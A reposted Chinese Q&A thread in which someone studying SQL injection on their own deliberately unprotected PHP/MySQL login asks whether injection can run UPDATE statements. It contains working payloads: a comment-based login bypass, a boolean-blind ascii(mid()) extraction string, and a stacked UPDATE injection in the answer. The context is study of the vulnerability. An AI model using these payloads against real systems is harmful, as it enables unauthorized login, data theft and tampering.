mysql – 可以在WHERE中执行UPDATE子句吗？

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了mysql – 可以在WHERE中执行UPDATE子句吗？，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1001字，纯文字阅读大概需要2分钟。

内容图文

我正在学习SQL注入,我构建了一个没有SQL注入保护的Web应用程序(PHP MYSQL(5.6)).

简而言之,我的Web应用程序使用

SELECT * FROM XXX.USER WHERE user_name='${USERNAME}' AND password='${PASSWORD}'

处理登录(如果该sql只返回1行,则登录成功).

一开始,我找到输入USERNAME Sayakiss’ – 然后我的SQL：

SELECT * FROM XXX.USER WHERE user_name='Sayakiss' -- ' AND password='${PASSWORD}'

通过这种方式,攻击者可以在没有密码的情况下以Sayakiss身份登录.

然后我发现更有趣的东西(select子句可以在if函数中) – 攻击者输入USERNAME为

Sayakiss' and if((select ascii(mid(z,p,1)) from x.y limit n,1)=c,1,0) -- 

这可以检查表x.y的列z的第n行的p位置字符的ascii是否等于c.

如果攻击者登录成功,那么他知道字符的ascii等于c.

因此,攻击者可以通过枚举获取我的数据库的所有内容！

现在我想知道,如何(如果可能的话)执行更新查询以类似方式编写数据库？

解决方法:

我相信,攻击者可以进行更新,可能需要表和字段的名称才能正确运行.
我认为查询会是这样的
‘Sayakiss’; UPDATE table_name SET field1 = new-value1,field2 = new-value2
 WHERE user_name =’Sayakiss’; –
Relevant和
Some more

内容总结

以上是互联网集市为您收集整理的mysql – 可以在WHERE中执行UPDATE子句吗？全部内容，希望文章能够帮你解决mysql – 可以在WHERE中执行UPDATE子句吗？所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端